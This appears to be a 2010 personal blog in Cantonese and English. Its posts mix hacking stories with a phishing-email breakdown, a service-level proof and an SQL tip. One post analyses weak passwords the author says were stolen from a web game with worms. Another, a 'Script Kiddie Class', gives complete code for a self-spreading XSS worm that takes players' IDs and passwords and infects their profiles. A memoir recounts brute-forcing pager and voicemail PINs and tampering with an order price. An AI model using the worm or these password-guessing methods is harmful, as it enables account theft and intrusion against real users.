2010年12月26日 星期日

Password Pattern Study

我懷疑我打中文先會有人睇,所以打中文。不過我估今次呢篇更加冇人想睇。

最近有人撩我玩某隻網頁遊戲,隻Game穿晒窿,後來放幾條蟲偷到一堆密碼,一堆弱密碼。
咩係弱密碼?一般來說,一個人會有幾組密碼,每組密碼都有特別用途。如果用響D緊要既網站,例如網上銀行、主要電郵,個密碼應該會係亂到唔知似乜 (如果你既強密碼唔係咁,咁你小心D啦)。至於一D無關痛癢既網,例如某D成日要你註冊左先可以下載附件既論壇,通常你D帳號密碼都係亂咁打架啦,呢D就係弱密碼。
拿到咁多好野梗係要研究下。今次要研究既係究竟D人最常用D乜來做弱密碼,同埋個密碼同帳號有咩關係。

數據數目:100,91個不同帳號,有5個改過一次密碼,有2個改過兩次密碼
帳號及密碼限制:4-8 英數字元、帳號不等於密碼 (個程式係咁定,唔關我事)
數據收集方法:唔講啦。

首先剩係睇下堆密碼:

長度分佈:
13% 4個字
4% 5個字
23% 6個字
8% 7個字
52% 8個字

結論:4-8個字密碼,8個字最多人用。雙數字最多人用,單數字比較少,得12%。

字元分佈:
53% 只用數字做密碼
10% 只用小楷英文做密碼
0% 只用大楷英文做密碼

100個密碼加埋總共有682個字元 (4*13+5*4+6*23+7*8+8*52)
74.3% 數字 (507)
25.2% 小楷英文 (172)
0.4% 大楷英文 (3)

結論:數字好受歡迎,全數字值得撞下。

各字元分佈:
8.06% - 0
12.17% - 1
10.12% - 2
7.04% - 3
5.72% - 4
5.87% - 5
7.18% - 6
5.87% - 7
5.57% - 8
6.74% - 9

2.79% - a
1.17% - b
0.73% - c
0.59% - d
1.32% - e
0.73% - f
1.61% - g
1.32% - h
2.49% - i
0.15% - j
1.76% - k
1.32% - l
1.03% - m
1.03% - n
0.73% - o
0.59% - p
0.00% - q
1.17% - r
0.88% - s
0.44% - t
1.32% - u
0.15% - v
0.15% - w
0.59% - x
0.59% - y
0.59% - z

0.15% - C
0.15% - K
0.15% - O
0.00% - OTHERS

都係數字最多架啦。數字最多至最少排序:
1, 2, 0, 6, 3, 9, 5, 7, 4, 8

小楷英文冇 q 用,我估係因為D人鍾意打英文生字。


重點研究:全數字特徵
密碼 4 個字:
1100, 1230, 1234, 1234, 1234, 1239, 1397, 2177, 2587, 5354, 6335
都幾多123_。自己試下響 Numpad 按下。

密碼 5 個字:
24622, 24622
重覆係因為條友開分身。

密碼 6 個字:
061093, 101091, 123321, 159005, 369258, 701226, 753951, 852456, 881029, 941123, 941123, 950219, 951753, 951753

都幾多疑似日期架喎。
ddmmyy: 061093, 101091
yymmdd: 701226, 881029, 941123, 941123, 950219
其他: 123321, 159005, 369258, 753951, 852456, 951753, 951753
又係自己用 Numpad 按下,好多連續鍵。

密碼 7 個字:
4560852
又係連續鍵啦

密碼 8 個字:
10260816, 10260816, 11181118, 11447788, 13191212, 17138045, 19940403, 19970422, 20001003, 20112012, 24687913, 疑似2字頭電話1, 疑似2字頭電話1, 疑似2字頭電話2, 疑似2字頭電話3, 疑似2字頭電話4, 疑似2字頭電話5, 疑似2字頭電話6, 疑似3字頭電話1, 疑似3字頭電話1, 疑似6字頭電話1, 疑似6字頭電話2, 疑似6字頭電話3, 疑似6字頭電話4, 疑似9字頭電話1

為保障參與者(?)私隱,部份疑似電話既密碼將被隱藏。
今次又有D疑似日期:mmddmmdd, yyyymmdd, (yyyyddmm? 我唔覺係囉。)

睇黎好多電話。如果你想撞人地D爛密碼,撞電話最好啦。
有人有興趣先再講。

2010年12月21日 星期二

Script Kiddie Class: Quine in XSS

Last time I demonstrated how to create a quine program, which output its own program code. This time I will talk about how can a malicious javascript code reproduces itself and infect to others.

In web applications, one critical vulnerability to users is Cross-site Scripting (XSS), which allows someone to inject client-side scripting code to the webpage. The following example is based on a real web game (with some modification):

Scenario (Ignore it if you don't like to read bullshxts)
Xyzzy Agora is a multi-player web-based game. Players can create their own character to join the virtual adventure. Just like other web-based role-play games, players can assign their own ID, password, nickname, color, avatar, battle slogan and website link during registration, which could be changed after registration except ID and nickname. Also, players can allocate additional stats points to their default abilities (5 points each) based on a random number.

After registration or after logging in, players will be redirected to a main street page. They can start adventure, buy weapons or equipments, train for their abilities, train their pets, ask NPCs for adventure information, battle with other players, change their information, send gifts to other players, send private message to other players, or go to the chat room. These actions are labeled in different buttons, and each button have its own form, with user ID, password, and action ID as hidden fields, where the button is the submit button of the form. On the top of each pages, the current online users are shown in a row, with the link to the corresponding profile page.

The nickname of a character is displayed as following:
<font color=**COLOR**>**NICKNAME**</font>
where **COLOR** is the color selected from a drop down list by the player during registration or profile update, and **NICKNAME** is the nickname picked during registration. Colored nickname will be displayed at every pages. Other players' colored nickname could be displayed at player's profile page, private message page, and chat room.

Vulnerabilities
1) The color attribute of a player's profile does not have proper XSS control. People can inject client-side script to the pages which displays other players' nickname.
2) User ID and password are stored in hidden fields of any pages after login. With XSS, people can extract those data by DOM easily.
3) Color attribute could be updated in the profile page. By using Quine in XSS, other player could be infected. The person who original post the code could remove it after someone has infected. This could be difficult to trace if there is no proper activity logs.
4) Private message will only shown to receiver. Sender has no idea about what message he has sent. For simplicity, the username and password will be sent to the attacker by private message, instead of sending to other website. (But this could be easily checked by the web game administrator)

Steps of Attack
1. Test for the XSS vulnerability by changing the color attribute in profile update page (profile.php)
0><script>alert('XSS')</script
Then the nickname will be displayed like this:
<font color=0><script>alert('XSS')</script>**NICKNAME**</font>

2. Identify the target XSS pages:
The highest traffic page among those potential XSS pages is chat room. The script should be able to run properly in the chat room (chat.php). Running on the player profile page and private message page would be a plus. You may also need to consider that players' own colored name will be shown on every pages, and you should avoid trigger your program too many times, as the private message has limit.

3. Write a password stealer
This example will used AJAX, since the destination (pm.php) is in the same domain.
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=encodeURIComponent(d.pass.value);
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
Explanation:
First line - return the XMLHttpObject (copied and modified from jQuery, to make it short)
Second line: store the victim's user ID and password, given that each pages' first form will store user ID in "uid" field, and password in "pass" field. encodeURIComponent would be useful to prevent broken links due to special characters in password.
Third line: the page that you want the victim to open, which will send the user ID and password to "someone".
Fourth line: send the get request via AJAX.

4. Write a code injector
Apart from stealing password, we are also interested in changing victim's color attribute, and spread the XSS worm. The XMLHttpObject and the stored user ID and password will be reused in the following script:
v='profile.php?uid='+i+'&pass='+p+'&color=*XSS CODE HERE*';
b=x();b.open('GET',v);b.send()
Now the problem is how to put back the entire program with XSS back to the color's parameter. The concept of Quine become useful in this problem. A javascript Quine is easier than other programming language, since javascript can refer to its function:
function $(){_=$+'$()'}$()
(I intentionally use some funny characters for the function name and variable name)
This code will run the $ function, and the entire program is stored in _ variable. You can put any code before or after the script like this:
function $(){document.write($+'$()');_=$+'$()';alert(_)}$()
The entire program is still stored in _ variable.
Now we can put all things together. Before that, I added some shortcut variables for some special characters:
l=String.fromCharCode(60);g=String.fromCharCode(62);
1+3+4 (In one single line):
0><script>
function $(){_=$+'$()';l=String.fromCharCode(60);g=String.fromCharCode(62);
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=d.pass.value;
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
v='profile.php?uid='+i+'&pass='+p+'&color=0'+encodeURIComponent(g+l+'script'+g+_+l+'/script'); b=x();b.open('GET',v);b.send()}$()
</script
Using this as your color attribute will give the first wave of XSS worm.

Remark

Referring a function in javascript may result in having additional line breaks and tabs. I have another code which make use of eval, and uses unescape for easier coding:
v='q=String.fromCharCode(39);w=%27v=%27+q+v+q+%27;eval(unescape(v))%27;alert(w);';eval(unescape(v))
Replace alert(w) for your code.
Another remark is to consider running multiple times of the program. You may use body onload event to force the XSS code run once even it appears in the same page many times. You may also need to add conditions to prevent running the code on some undesired pages.

If you are interested in this scenario or example, you may ask me for a prototype demo. (Well, I think no one will read this bullshxt :D)

2010年12月20日 星期一

Script Kiddie Class: Quine

How can a program output its program code in runtime? It could be quite difficult. Let's see an example in VB:

Debug.Print("Code")
The output is Code, but I want the output to be Debug.Print("Code").

Debug.Print("Debug.Print(""Code"")")
Now the output is Debug.Print("Code"), but the program code has already changed, and I want Debug.Print("Debug.Print(""Code"")") now.


It would be rather difficult if you just directly print something. To write a quine program, you should have your program code stored in a string for output.

Example:

Function Q(x) As String
t = Split(x, vbCrLf)
For i = 0 To UBound(t) - 1
Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & " & vbCrLf & _" & vbCrLf & vbTab & vbTab
Next
Q = Q & Chr(34) & t(i) & Chr(34)
End Function

Sub Form_Load()
V = "Function Q(x) As String" & vbCrLf & _
" t = Split(x, vbCrLf)" & vbCrLf & _
" For i = 0 To UBound(t) - 1" & vbCrLf & _
" Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & "" & vbCrLf & _"" & vbCrLf & vbTab & vbTab" & vbCrLf & _
" Next" & vbCrLf & _
" Q = Q & Chr(34) & t(i) & Chr(34)" & vbCrLf & _
"End Function" & vbCrLf & _
"" & vbCrLf & _
"Sub Form_Load()" & vbCrLf & _
" V = ?" & vbCrLf & _
" Debug.Print Replace(V, Chr(63), Q(V))" & vbCrLf & _
"End Sub"
Debug.Print Replace(V, Chr(63), Q(V))
End Sub
The entire program is stored in V, and the function Q is to escape the string, and the question mark (chr 63) is to assign the escaped program code string to variable V.



Looks funny but messy. Then what is the purpose of doing this? ... I'll tell you later.

2010年10月21日 星期四

A long time ago

今日幾特別。對我來講特別過 10-10-10,因為 10-21-10 21歲生日。
順便講下十幾年前既奇聞。以下內容當笑話就好啦。

-------------------------------------------------
今晚原本想叫 P*xx*H*t (廢事 Google 發功),一去到一人套餐果頁,得晚餐揀。
咪以為我又搞 Gag。 晚餐四十幾蚊一份,下午茶先三十五蚊。梗係買下午茶。
於是我發一發功,俾我 Order 到下午茶個價。(高手們可以試下)
正當我想 Submit 之際,我就諗:P*xx*H*t 會唔會報警拉我呢,拉我我咪得不償失。
(其實以前發過功都冇事)

細個果陣根本就唔會諗呢D野。如果十幾年前真係有人拉我,話唔定我依家仲出名過陳咩希,話唔定啦。

-------------------------------------------------
十幾年前屋企冇錢 (依家都係),玩具都冇乜。人地玩咩「洋娃娃」「機械人」,我就砌麻雀。砌麻雀都砌到悶,暑假又冇野玩,冇野玩就搵野玩。

呢樣野我相信每個人屋企都有,而且係高科技產品。
洗衣機?家長點會俾小朋友玩洗衣機呢。出事架嘛。
雪櫃?係既話我依家應該係讀物理。
電視?我果陣時仲未叻到可以偷睇有線電視。
收音機?我有咁叻就好。我知道有高手玩部收音機來偷聽。

估到係咩未呢?其實係電話。
果陣時電話冇來電顯示,一於亂咁打。

-------------------------------------------------
"Spam"

以前冇來電顯示,想整蠱人,通常都係打佢電話之後唔出聲。

講返玩電話,響我亂咁打之際,打到有個 2921 二二二二 (廢事 Google 發功),到今日都仲係。其實係郵局個電話錄音熱線。我都唔知點解會撞到呢個電話。

佢有個功能係傳真郵局資料。叫我打傳真機號碼,我就打自己屋企個電話,之後我就收線。
隔幾分鐘,電話響。一聽,好似拍戲果D洗腦咁。聽到 "BiBoBeaBoBeaBoBeaBo BoBeaBoBea.."
原來傳真機通去電話會有D咁既怪聲。


Spam: 打去有傳真服務既電話,傳真機號碼打人地屋企個電話。

自從有電腦之後,我都好耐冇出過呢招。

-------------------------------------------------
"Brute Force 1"

九十年代初,傳呼機仲係好盛行。當時我老豆都有一部。平時要 Call 都係打上 Call 台,之後同個 Call 台 Lady 講想 Call 邊位同埋留低咩 Message。

我記得打去 Call 台係打 7 字頭。你問我幾號我真係唔記得 (都唔知點解我記得 2921 果個)。玩電話最忌就係聽到真人聲,電話錄音就最好玩。後來我發現將個 Call 台電話改一隻字,就會變左電話錄音。

第一句錄音係 歡迎使用 *** (我連邊間公司都唔記得。幾失敗。)
第二句係「請輸入傳呼機號碼」
通常都係 4 個字。之後當然係咁撞。
撞到一個Call機號碼之後,佢就會叫你輸入/留 Message,或者按*入管理模式。
我梗係按*。之後叫我打密碼。密碼都係 4 個字以內,如果撞錯 3 次會 Cut 你線。


最初都係撞 1234 呢類連續數。結果都有唔少收鑊。
之後無聊撞返個傳呼機號碼。例如一開始入 4622 ,之後按*,之後撞 4622。
雖然冇 1234 咁多,但係都有收鑊。
後來唔知邊度聽返來,有個預設密碼係 2828。結果就撞 2828,成功率非常高,高過 1234 好多。

暑假有幾日就係咁撞,撞到寫滿十幾頁。我估都有二百幾三百個。

Q: 一個 Call 台咪最多得一萬個,你點撞到咁多啊?
A: 打去另一個 Call 台。又係改幾隻數字就去到。另外我仲發現某D帳號有D神秘功能,例如留言,改語言等。

Q: 爆左帳號之後點?
A: 除左抄低之後,我應該有幫人改密碼,同埋聽下留言(好似冇個聽得明,因為Call機 Message 應該係一堆暗號)。

-------------------------------------------------
"Brute Force 2"

話就話 Call 機好多人用,但係都唔少人用手機。以前香港電訊有個客戶服務電話係 二八八八 1010。果個電話好似都有傳真功能,嘿嘿。
後來又唔知點撞撞到個 90211010 。睇黎我成日都撞 "21" 。
入到去原來係留言信箱 Management System。
把聲仲係 依家 CSL 啊 PCCW 果把女人電話錄音聲。

結果又係撞個帳號(手提電話號碼),之後就撞密碼。
今次難過傳呼機果個好多。因為有 8 個字。
通常都係撞 1234,123456,12345678,同埋帳號,有時會掉轉個帳號。
又係撞 3 次 CUT 你。

今次就冇二百幾個,不過都應該有幾十個。
個留言信箱幾好玩,因為有得玩錄音。
可以 edit 個留言信箱第一句講乜:"呢度係…" & custom 聲 & "請你係嗶一聲之後留低口訊 (或打 9xxx xxxx)"
呢個 或打 9xxx xxxx 又係另一個功能。以前撞埋一堆帳號之後,就用呢個 "或者 9xxx xxxx" 串埋一齊。每一串個密碼全部都係一樣。

例如撞到 90212345,90224680,90288888,
90212345 會叫你打 90224680
90224680 會叫你打 90288888
90288888 會叫你打 90212345
三個帳號密碼都係一樣。
過幾日之後,我發現某一串電話全部入唔返。我就知出事了。

後來知道 9XX11010 係 1010 留言信箱系統,適用於 9XXYYYYY。所以我撞到 11010 都算好彩。


Brute Force: 撞 Default 密碼最好。至於連續數(/字)同埋帳號,都係唔錯既選擇。
不過我諗依家都唔會有人用D咁低能既密碼掛。

-------------------------------------------------

以前撞數字都撞得好順,好似D數字話俾我知要點撞咁。
依家連大廈密碼都唔記得。

想知其他軼事可以叫我寫。

2010年9月26日 星期日

爛釣魚電郵

寄件人 LibertyReserve.com
收件人 "LibertyReserve.com"
日期 2010年9月26日下午7:39
主旨 Please confirm your e-mail address
寄件人 rocket.totalwebdesigns.com

==================================
Liberty Reserve Account Information Error
==================================

You are receiving this e-mail because your e-mail address has been detected being invalid. Possible reason: an e-mail sent from Liberty Reserve bounced back to our mailbox. All accounts which bounce mail back will be marked inactive and blocked for 30 days period. We apologise for the inconvinience, but the safety of your funds is our main priority.

To confirm that your e-mail address is valid, please click on the link below:

https://www.libertyreserve.com/en/customer/confirm.aspx?code=9030054170&action=confirm&info=email&c=WoNsQ

This will keep your Liberty Reserve account active.

The current settings for your account can be viewed and modified at the Liberty Reserve website by choosing the Profile menu selection while accessing your account.

Sincerely,
Liberty Reserve Customer Service






一睇仲以為係咩 "Library Reserve"。原來係 e-payment system。睇個樣都知想打劫啦。

條 link 實際係:
http://www.libertyreserve.com.l-en.l-customer.l-confirm.aspx.l-id.3b.x9.pq.lr.v6.b3.sub4free.de/whois.php?a%63ti%6Fn=l%6F%6Fkup&a%63c%6Funt=www.libertyreserve.com%3C/ti%74le%3E%3Cf%72ame%73et%3E%3Cf%72ame%20%73%72%63%3D%68%74%74%70%3A%2F%2F%70%71%76%2E%74%7A%7A%2E%64%65%2F%3E%3C/f%72ame%3E%3Cnof%72ames%3E%


https 都冇埋。
原來 slash 用 .l- 來代替。
之後 咩 id 3b x9 pq lr vb b3 都唔知想扮乜。
最後 sub4free.de 原來係一個轉址網站。仲要係爛 Link。


之後又一大堆奇怪野。解碼(?):
whois.php?action=lookup&
account=www.libertyreserve.com<frame%20src%3dhttp://pqv.tzz.de><noframes>%



圖例:

真:

假:

假野連 PIN 都唔 Hide 個 input,假到你丫。
假野個 captcha 永遠都係 7262,仲要唔打都得。
你按 Next 就會 post 你打過既野去釣魚佬個 Server。


乜都唔打:去 lb3.html
多左個 error message: "Error: Invalid Account Number/Passphrase/Login PIN/MasterKey/E-Mail Address. Please try again. "
captcha 永遠都係 2370

我熄左 Javascript 按 next 就會去 lb2.html,彈一句 Thank you。
唔知點解可以過到。tripod 真係奇怪。




結論:太假。太爛。但係橋唔怕舊。

2010年8月13日 星期五

黑到爆

是日諸事不順
細節不談。

2010年5月30日 星期日

Breaking a cipher

Key: LMUL
f(KEY) ->

圖片網址中的 code=4rH2grkcMzX%2fFwvVslkbUQ%3d%3d 十分有趣。
4rH2grkcMzX/FwvVslkbUQ== 是 Base64 encoding.

解一解變左:漹??35 梐Y Q
都唔知寫乜。

旁道攻擊(side-channel attack):
諗緊好唔好下下 Submit 都係 LMUL。

睇下其他例子


Key: TzzP
f(Key) ->
Code: koc1iZBaIgBLSK/EvweswA==
解出來又係一堆怪獸字。

會唔會係用 XOR cipher 呢。

2010年2月13日 星期六

Optimum Service Levels

Very odd formulas in the notes. Let me try to have some proof.

Find a service level such that profit is maximized:
"Revenue" at service level S for a year
= P(S)
= (Price - "Cost") * Annual Sales * Sales Response(S)
= Trading Margin * Annual Sales * Sales Response(S)
(Why this is "Revenue" ? ...)

Logistics Cost at service level S for a year
= C(S)
= Annual Holding Cost(S)
(I assume those ordering cost, material cost or whatever cost except holding cost are counted in that "Cost".)

Objective function: Y(S) = P(S) - C(S)
Take the derivative, Y'(S) = P'(S) - C'(S)
Function maximized when Y'(S) = 0 <=> P'(S) = C'(S)


Marginal "Revenue" = Trading Margin * Annual Sales * Sales Response Rate
(Sales Response Rate = Change in Sales Response per Unit change in Service Level. Assume it is a constant.)

Marginal Logistics Cost = Change in Annual Holding Cost per Unit change in Service Level
= Annual Holding Cost * Change in number of Inventory per Unit change in Service Level
= (Percentage Annual Holding Cost * Standard Product Cost) * SD of demand during lead time * Change in Z per Unit change in Service Level


Inventory during lead time = Expected Demand + Safety Stock
Increasing Service Level needs to increase Safety Stock (for the extra demand during lead time)

P(Demand < Inventory) = Service Level
P((Demand - Expected Demand)/SD < Safety Stock/SD) = Service Level
P(Z < Safety Stock/SD) = Service Level
Safety Stock = Z_Service Level * SD



OK. The proof is not fun.
Calculator program will be provided later. (Still thinking.)

2010年1月5日 星期二

[SQL]Assign sequential numbers randomly for a particular group of records

Spammer Tang asked me, "How?"
I said, "Why don't you just use PHP?"

Anyway, I got a solution by just using SQL.
Here is the example records:
[table `team`]
id name dept ticket
1 Samuel 1 0
2 Patrick 1 0
3 Arthur 1 0
4 Martin 1 0
5 Ozetta 3 0
6 Alice 2 0
7 Bob 2 0
8 Carol 2 0
9 Dave 2 0
10 Mallory 3 0
11 Steve 3 0
12 Victor 3 0

Now we want to assign 1, 2, 3, 4 randomly on the ticket column where the dept code is 1 (first 4 records). Here is my solution:
SET @dept = 1;
DROP TABLE IF EXISTS temp_map;
CREATE TABLE temp_map(p INT NOT NULL AUTO_INCREMENT PRIMARY KEY, q INT NOT NULL);
INSERT INTO temp_map (SELECT NULL, id FROM team WHERE dept = @dept);
DROP TABLE IF EXISTS temp_ticket;
CREATE TABLE temp_ticket(u INT NOT NULL AUTO_INCREMENT PRIMARY KEY, v INT NOT NULL);
INSERT INTO temp_ticket (SELECT NULL, p FROM temp_map ORDER BY RAND());
UPDATE team a SET ticket = (SELECT c.v FROM temp_map b, temp_ticket c WHERE a.id = b.q AND b.p = c.u) WHERE dept = @dept;
DROP TABLE temp_map; DROP TABLE temp_ticket;
First we define which dept we are going to assign tickets. Actually this can also be done by php, asp or whatever easily, depends on your environment.

Then we create two temporary table for mapping. The first one is to map the IDs of the original table to a new ascending sequence. This is because the IDs of the original table with the same dept code may not continuous. For example, if the dept code is 3, then the mapping will be like this:
p q
1 5
2 10
3 11
4 12

The second table generates a random sequence, by using ORDER BY RAND(). You may find other faster or efficient way to do this. Here is one of the possible result:
u v
1 3
2 4
3 1
4 2
(v value may be different.)

Finally we update the tickets from the original table given the above two tables. Note that there is a where clause after the sub-query. This is to prevent updating other records' ticket to zero or null.

The last line is just to remove the temporary tables. You may ignore this.

Please feel free to leave comments or give any suggestions to this solution.

2010年1月1日 星期五

Walkthrough

Program:
http://ic.ozetta.net/ic.0/p.txt

Other will be posted later.

Cannot Login? That is your fate.